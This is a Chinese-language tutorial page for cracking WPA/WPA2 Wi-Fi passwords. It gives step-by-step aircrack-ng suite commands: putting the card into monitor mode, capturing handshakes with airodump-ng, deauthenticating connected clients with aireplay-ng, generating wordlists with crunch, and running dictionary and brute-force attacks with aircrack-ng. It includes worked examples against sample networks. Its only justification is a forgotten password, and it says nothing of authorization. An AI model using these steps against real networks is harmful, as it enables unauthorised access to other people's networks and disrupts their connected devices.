知识问答

WPA-WPA2无线网络密码破解图文教程

下面是“WPA/WPA2无线网络密码破解图文教程”的完整攻略,包括两个示例说明。

WPA/WPA2无线网络密码破解图文教程

背景介绍

WPA/WPA2是目前使用最为广泛的无线网络加密方式之一。但是,在某些情况下(比如忘记密码),我们需要破解已经连接的无线网络密码。本文将介绍WPA/WPA2无线网络密码破解的方法。

破解方法

准备工作

  1. 首先,我们需要安装一个Linux系统(比如Kali Linux)。
  2. 安装aircrack-ng程序。
  3. 确保我们的无线网卡支持Monitor(**)模式。可以使用以下命令检查:
    iwconfig
    如果无线网卡支持Monitor模式,将显示“Mode:Monitor”。
  4. 禁用NetworkManager服务,以免影响破解工作。可以使用以下命令禁用:
    systemctl stop NetworkManager
    systemctl disable NetworkManager

搜寻目标网络

  1. 执行以下命令扫描周围的无线网络:
    airodump-ng wlan0mon
    其中,“wlan0mon”是我们的无线网卡的名字。
  2. 稍等片刻,我们就可以看到周围所有的无线网络名称和信号强度。找到我们要破解的目标网络的ESSID(名字)和BSSID(物理地址)。

抓取握手包

  1. 使用以下命令抓取与目标网络建立握手包时的数据包:
    airodump-ng -c [CHANNEL] -w [CAPTURE_FILE_NAME] --bssid [BSSID] wlan0mon
    其中,“CHANNEL”是目标网络的信道,可以在上一步中看到;“CAPTURE_FILE_NAME”是抓取数据包的文件名;“BSSID”是目标网络的物理地址。
  2. 执行以上命令后,等待目标设备与网络建立通信,此时数据包就会被抓下来,自动生成一个或多个文件。

先用常规字典攻击

  1. 使用以下命令进行常规字典攻击:
    aircrack-ng -w [WORDLIST_FILE_NAME] [CAPTURE_FILE_NAME]
    其中,“WORDLIST_FILE_NAME”是我们保存的字典文件名。“CAPTURE_FILE_NAME”是我们在上一步中抓到的文件名。
  2. 稍等片刻,如果目标网络的密码在字典文件中,程序就会显示出密码。

使用暴力破解

如果常规字典攻击没有破解成功,我们可以尝试使用暴力破解。

  1. 首先,需要生成一个握手包,使用以下命令:
    aireplay-ng --deauth 100 -a [BSSID] -c [STATION MAC] wlan0mon
    其中,“BSSID”是目标网络的物理地址,“STATION MAC”是连接到目标网络的设备的MAC地址。
  2. 接着,在Kali Linux系统下安装一个密码生成器crunch,可以使用以下命令:
    apt-get install crunch
  3. 然后,像这样使用crunch生成密码列表:
    crunch [MIN LENGTH] [MAX LENGTH] [CHARACTER SET] -o [OUTPUT FILE NAME]
    其中,“MIN LENGTH”和“MAX LENGTH”是指定密码长度的参数,“CHARACTER SET”是指定密码字符集的参数,“OUTPUT FILE NAME”是生成的密码列表的文件名。
  4. 使用以下命令进行暴力破解:
    aircrack-ng -w [PASSWORD LIST] [CAPTURE_FILE_NAME]
    其中,“PASSWORD LIST”是我们刚才生成的密码列表的文件名;“CAPTURE_FILE_NAME”是我们在抓包时保存的数据包文件名。
  5. 稍等片刻,如果破解成功,程序就会显示出密码。

示例说明

示例一

假设我们要破解的无线网络的ESSID为“mywifi”,BSSID为“12:34:56:78:90:ab”,信道为“6”。

我们可以使用以下命令抓取握手包文件:

airodump-ng -c 6 -w capture --bssid 12:34:56:78:90:ab wlan0mon

接着,我们可以使用以下命令进行字典攻击:

aircrack-ng -w wordlist.txt capture.cap

如果成功,程序就会显示出密码。

示例二

假设目标无线网络名称为“myhome”,BSSID为“ab:cd:ef:12:34:56”。

我们可以使用以下命令生成密码列表:

crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o passwordlist.txt

该命令将生成一个8位长度的密码列表,并将其保存到“passwordlist.txt”文件中。

我们可以使用以下命令抓取握手包文件:

airodump-ng -c 10 -w capture --bssid ab:cd:ef:12:34:56 wlan0mon

接着,我们可以使用以下命令进行暴力破解:

aircrack-ng -w passwordlist.txt capture.cap

如果成功,程序就会显示出密码。